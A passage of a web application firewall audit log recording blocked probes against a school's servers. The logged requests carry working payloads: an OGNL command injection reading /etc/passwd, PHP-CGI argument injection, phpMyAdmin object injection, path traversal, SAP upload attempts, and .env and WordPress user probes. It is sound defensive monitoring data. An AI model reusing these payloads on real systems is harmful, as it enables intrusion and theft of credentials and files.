smkn22-jkt.sch.id X-Forwarded-For: 43.225.163.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ff951d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff951d51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748581446437433 2823 (- - -) Stopwatch2: 1748581446437433 2823; combined=1273, p1=413, p2=831, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff951d51-Z-- --cc475229-A-- [30/May/2025:12:09:45 +0700] aDk9mZxu2QkuXt3B9jaYTwAAAIU 103.236.140.4 39604 103.236.140.4 8181 --cc475229-B-- POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 77.90.153.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 77.90.153.48 X-Forwarded-Proto: http Connection: close Content-Length: 516 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24 Content-Type: multipart/form-data --cc475229-C-- PK .propertiesœÑÍjAà“ù!üÉHî\d™îÀÈÈüCéhˆ îâuºfªÛš®Ê­ÛZÉÂÇÂ\‰/ [×Ùú‚ÒcÃèN<«Spø ¸ï¿£ë— zEq%¹‰Ø:Å’+?\ÿrê·Þµ°”"ÊÔ„*#^°‘Öë¤^'‹õN`ôÌ}òZè…Q½6¯>8ûÐFk«ÆR¶Gc±<ŠhV^[“wûê´_GºZ‚óŽm¡Æ²U’T¬<ãÒßþ>¹îò·OŸ7žý'}m®_°äks¬T?=Lßn^\ùqÆm,iòúžÍÔgYR¬P%Úr.'‚õßß7TN“ÇÂy9ÝIÑ™äFã ¢m½4=rlÅŽ­iÞmV“y îgÁ€þHœmû‚¯éáôåq?+«bX ¶O©_ÊI¿*˜e[òÏ”5µ*èhç‚àf]n$ÉÿApn÷ÙÁ£Ã'[ïîï zÞÎÔQs†£’f*„à~ÿÿPK57Ùuz4PK57Ùuz4 .propertiesPK9³ --cc475229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc475229-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||103.236.140.4|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748581785133233 2667 (- - -) Stopwatch2: 1748581785133233 2667; combined=1522, p1=458, p2=1033, p3=0, p4=0, p5=31, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc475229-Z-- --af763a06-A-- [30/May/2025:12:10:17 +0700] aDk9ubW504ObxUT6Rrz7VQAAAAA 103.236.140.4 39752 103.236.140.4 8181 --af763a06-B-- POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 77.90.153.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 77.90.153.48 X-Forwarded-Proto: https Connection: close Content-Length: 517 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15 Content-Type: multipart/form-data --af763a06-C-- PK .propertiesœÑÍjAà“ù!üÉHî\d™îed þ! Žt4Dwñ:]ÓÕ=5]•[·MÅ…!>„ ¸_@·®³õ ¥ÇèN<«Spø ¸ï¿£ë—KzEq-…‰÷Ù:ÅR(?XýòÚõo¿ka!E”©1ÕF¼`-mÖI³NÎÖÛÑ;c×B/ê}¼°~õáé‡6Z»X6–²]‰å!–D³òÚš,¸;wѤ}èh Î;¶¥ÉFER³òŒKû{事ß>}^{ñõŸô•™~À‚g¬Ì°JIüì }»~£åÇ)·±8D¤Éëû6SCtœeI±DµhË…œVßP•'O„‹*ßNÑFá ¢m½Ì{äØŠY3·Yg5¸ŸóúôGâlÓ—|]òÉѵ¬ªËAÙß”|’ŸÈ ¤­­IlÉK"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748582782455945 2247 (- - -) Stopwatch2: 1748582782455945 2247; combined=1014, p1=421, p2=563, p3=0, p4=0, p5=30, sr=118, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7840a12d-Z-- --ab560d15-A-- [30/May/2025:12:48:48 +0700] aDlGwJxu2QkuXt3B9jabAwAAAJc 103.236.140.4 46492 103.236.140.4 8181 --ab560d15-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 188.166.108.93 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ab560d15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab560d15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748584128793223 764 (- - -) Stopwatch2: 1748584128793223 764; combined=302, p1=265, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab560d15-Z-- --140cce23-A-- [30/May/2025:12:54:59 +0700] aDlIM4Wl_OZMPH_FZ2DVAgAAAME 103.236.140.4 46568 103.236.140.4 8181 --140cce23-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.151.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.151.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --140cce23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --140cce23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748584499656015 2865 (- - -) Stopwatch2: 1748584499656015 2865; combined=1308, p1=442, p2=837, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --140cce23-Z-- --3f790701-A-- [30/May/2025:13:04:08 +0700] aDlKWLW504ObxUT6Rrz-dwAAAAI 103.236.140.4 46622 103.236.140.4 8181 --3f790701-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.228.43.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.228.43.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3f790701-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f790701-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748585048919896 2823 (- - -) Stopwatch2: 1748585048919896 2823; combined=1265, p1=444, p2=790, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f790701-Z-- --9902ea0b-A-- [30/May/2025:13:09:32 +0700] aDlLnLW504ObxUT6Rrz-gQAAABE 103.236.140.4 46704 103.236.140.4 8181 --9902ea0b-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.174.87 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.174.87 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --9902ea0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9902ea0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748585372075518 751 (- - -) Stopwatch2: 1748585372075518 751; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9902ea0b-Z-- --ace4f70a-A-- [30/May/2025:13:36:06 +0700] aDlR1hNBDSvkc-tIZOnn_wAAAE0 103.236.140.4 46902 103.236.140.4 8181 --ace4f70a-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.233.36 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.233.36 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ace4f70a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ace4f70a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748586966498859 678 (- - -) Stopwatch2: 1748586966498859 678; combined=250, p1=223, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ace4f70a-Z-- --61c35009-A-- [30/May/2025:14:55:51 +0700] aDlkh4Wl_OZMPH_FZ2DZVwAAANc 103.236.140.4 33592 103.236.140.4 8181 --61c35009-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.178.94.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.178.94.73 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --61c35009-C-- --61c35009-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61c35009-E-- --61c35009-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748591751792242 5487 (- - -) Stopwatch2: 1748591751792242 5487; combined=4218, p1=489, p2=3672, p3=0, p4=0, p5=57, sr=100, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61c35009-Z-- --5ca4a26a-A-- [30/May/2025:15:18:57 +0700] aDlp8bW504ObxUT6RrwB5gAAAAQ 103.236.140.4 34064 103.236.140.4 8181 --5ca4a26a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 3.141.23.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 3.141.23.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ca4a26a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ca4a26a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748593137543886 3424 (- - -) Stopwatch2: 1748593137543886 3424; combined=1496, p1=490, p2=973, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca4a26a-Z-- --e0270f39-A-- [30/May/2025:15:25:27 +0700] aDlrd5xu2QkuXt3B9jafcwAAAJY 103.236.140.4 34156 103.236.140.4 8181 --e0270f39-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e0270f39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0270f39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748593527817508 945 (- - -) Stopwatch2: 1748593527817508 945; combined=356, p1=317, p2=0, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0270f39-Z-- --280dfe60-A-- [30/May/2025:15:27:58 +0700] aDlsDrW504ObxUT6RrwB-wAAAAs 103.236.140.4 35238 103.236.140.4 8181 --280dfe60-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.20.83.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.20.83.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --280dfe60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --280dfe60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748593678377920 3282 (- - -) Stopwatch2: 1748593678377920 3282; combined=1376, p1=510, p2=837, p3=0, p4=0, p5=29, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --280dfe60-Z-- --5c8a6c20-A-- [30/May/2025:15:30:41 +0700] aDlssYWl_OZMPH_FZ2Da0AAAAM8 103.236.140.4 35272 103.236.140.4 8181 --5c8a6c20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 159.65.189.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.65.189.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5c8a6c20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c8a6c20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748593841153191 2961 (- - -) Stopwatch2: 1748593841153191 2961; combined=1282, p1=455, p2=797, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c8a6c20-Z-- --ce17ba1a-A-- [30/May/2025:15:34:00 +0700] aDlteLW504ObxUT6RrwCBQAAABg 103.236.140.4 35284 103.236.140.4 8181 --ce17ba1a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept-Charset: utf-8 --ce17ba1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce17ba1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748594040027050 901 (- - -) Stopwatch2: 1748594040027050 901; combined=390, p1=340, p2=0, p3=0, p4=0, p5=49, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce17ba1a-Z-- --61c3ff70-A-- [30/May/2025:15:36:15 +0700] aDlt_4Wl_OZMPH_FZ2Da1gAAANE 103.236.140.4 35306 103.236.140.4 8181 --61c3ff70-B-- POST /login.action HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 596 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded --61c3ff70-C-- username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D --61c3ff70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61c3ff70-E-- --61c3ff70-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /login.action"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175509247 2215 (- - -) Stopwatch2: 1748594175509247 2215; combined=687, p1=478, p2=173, p3=0, p4=0, p5=35, sr=81, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61c3ff70-Z-- --c3cbf32d-A-- [30/May/2025:15:36:15 +0700] aDlt_5xu2QkuXt3B9jafzAAAAIM 103.236.140.4 35318 103.236.140.4 8181 --c3cbf32d-B-- POST /scripts/setup.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 80 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --c3cbf32d-C-- action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} --c3cbf32d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3cbf32d-E-- --c3cbf32d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/setup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175509999 1647 (- - -) Stopwatch2: 1748594175509999 1647; combined=417, p1=296, p2=88, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3cbf32d-Z-- --d8b6677b-A-- [30/May/2025:15:36:15 +0700] aDlt_xNBDSvkc-tIZOnr2QAAAEc 103.236.140.4 35322 103.236.140.4 8181 --d8b6677b-B-- GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id 